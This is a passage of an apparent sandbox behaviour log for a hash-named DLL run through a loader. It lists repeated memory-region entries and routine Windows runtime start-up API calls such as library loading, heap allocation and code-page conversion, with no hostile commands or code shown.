0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3737 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3738 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3739 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3740 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3741 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3742 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3743 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3744 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3745 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3746 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3747 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3748 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3749 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3750 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3751 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3752 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3753 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3754 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3755 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3756 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3757 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3758 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3759 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3760 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3761 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3762 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3763 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3764 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3765 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3766 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3767 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3768 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3769 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3770 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3771 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3772 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3773 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3774 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3775 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3776 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3777 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3778 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3779 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3780 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3781 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3782 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3783 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3784 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3785 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3786 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3787 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3788 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3789 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3790 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3791 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3792 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3793 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3794 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3795 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3796 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3797 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3798 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3799 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3800 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3801 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3802 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3803 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3804 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 6077 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 6078 start_va = 0x1b0000 end_va = 0x1d1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 6079 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 6080 start_va = 0x1b0000 end_va = 0x1b6fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Thread: id = 136 os_tid = 0x11ac [0126.093] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0126.093] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0126.093] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0126.094] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0126.094] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0126.094] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0126.094] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="InitializeCriticalSectionEx") returned 0x7ffc5bff7c50 [0126.095] GetProcessHeap () returned 0x520000 [0126.095] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0126.095] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsAlloc") returned 0x7ffc5c007e50 [0126.095] GetLastError () returned 0x7e [0126.095] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsGetValue") returned 0x7ffc5bfe3780 [0126.095] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="FlsSetValue") returned 0x7ffc5bff3cb0 [0126.096] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x3c8) returned 0x52bec0 [0126.096] SetLastError (dwErrCode=0x7e) [0126.096] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x8, Size=0x1200) returned 0x533b10 [0126.098] GetStartupInfoW (in: lpStartupInfo=0x14fe10 | out: lpStartupInfo=0x14fe10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0126.098] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0126.098] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0126.098] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0126.098] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_decompress" [0126.098] GetCommandLineW () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\GIUmlOL.exe\" /dll=\"C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll\" /fn_id=opj_create_decompress" [0126.098] GetACP () returned 0x4e4 [0126.098] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x228) returned 0x524f20 [0126.098] IsValidCodePage (CodePage=0x4e4) returned 1 [0126.098] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14fdd0 | out: lpCPInfo=0x14fdd0) returned 1 [0126.098] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x14f670 | out: lpCPInfo=0x14f670) returned 1 [0126.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0126.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f3c0, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼") returned 256 [0126.098] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ啐徑翼", cchSrc=256, lpCharType=0x14f990 | out: lpCharType=0x14f990) returned 1 [0126.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0126.098] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0126.099] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x7ffc5bfa0000 [0126.099] GetProcAddress (hModule=0x7ffc5bfa0000, lpProcName="LCMapStringEx") returned 0x7ffc5bfb5350 [0126.099] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0126.099] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0126.099] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x14f790, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0126.099] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0126.099] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x14f690, cbMultiByte=256, lpWideCharStr=0x14f360, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0126.099] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0126.099] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x14f150, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌") returned 256 [0126.099] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸ쳌", cchWideChar=256, lpMultiByteStr=0x14f890, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 